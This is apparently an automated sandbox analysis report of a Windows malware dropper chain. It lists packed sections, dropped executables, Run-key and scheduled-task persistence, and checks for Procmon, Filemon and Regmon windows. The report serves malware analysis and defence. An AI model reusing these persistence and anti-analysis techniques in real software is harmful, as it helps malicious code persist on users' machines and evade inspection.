Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2994688 > 1048576
Source: file.exe Static PE information: Raw size of hinhbduz is bigger than: 0x100000 < 0x2b1c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2418802394.0000000000A32000.00000040.00000001.01000000.00000009.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000003.2283631779.0000000004700000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Unpacked PE file: 3.2.S14AV77TIR9DRWSCWIW0.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Unpacked PE file: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Unpacked PE file: 5.2.QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W;ohppgexj:EW;lrldjnhc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 8.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 9.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Unpacked PE file: 10.2.606f2f6db0.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 11.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 28.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Unpacked PE file: 31.2.606f2f6db0.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: 976d9f40c1.exe.8.dr Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: 606f2f6db0.exe.8.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: real checksum: 0x2bc9c7 should be: 0x2bd233
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: real checksum: 0x1e03ba should be: 0x1e2b8e
Source: file.exe Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1e03ba should be: 0x1e2b8e
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: hinhbduz
Source: file.exe Static PE information: section name: spippvyb
Source: file.exe Static PE information: section name: .taggant
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: ptpgbbgo
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: epijyeip
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .taggant
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .rsrc
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .idata
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: njaoxwad
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: wxwvdadu
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .taggant
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .idata
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: ohppgexj
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: lrldjnhc
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: ptpgbbgo
Source: skotes.exe.3.dr Static PE information: section name: epijyeip
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: hinhbduz
Source: random[1].exe.8.dr Static PE information: section name: spippvyb
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 976d9f40c1.exe.8.dr Static PE information: section name:
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .rsrc
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .idata
Source: 976d9f40c1.exe.8.dr Static PE information: section name: hinhbduz
Source: 976d9f40c1.exe.8.dr Static PE information: section name: spippvyb
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: njaoxwad
Source: random[1].exe0.8.dr Static PE information: section name: wxwvdadu
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .rsrc
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .idata
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: njaoxwad
Source: 606f2f6db0.exe.8.dr Static PE information: section name: wxwvdadu
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059947C5 push BA007734h; ret 0_3_059947CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059947C5 push BA007734h; ret 0_3_059947CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010E94E5 push ss; iretd 0_3_010E94EA
Source: file.exe Static PE information: section name: entropy: 7.974874912426468
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: entropy: 7.9749859248293
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: ptpgbbgo entropy: 7.954091941030984
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: entropy: 7.802495720845902
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.9749859248293
Source: skotes.exe.3.dr Static PE information: section name: ptpgbbgo entropy: 7.954091941030984
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.974874912426468
Source: 976d9f40c1.exe.8.dr Static PE information: section name: entropy: 7.974874912426468
Source: random[1].exe0.8.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: 606f2f6db0.exe.8.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
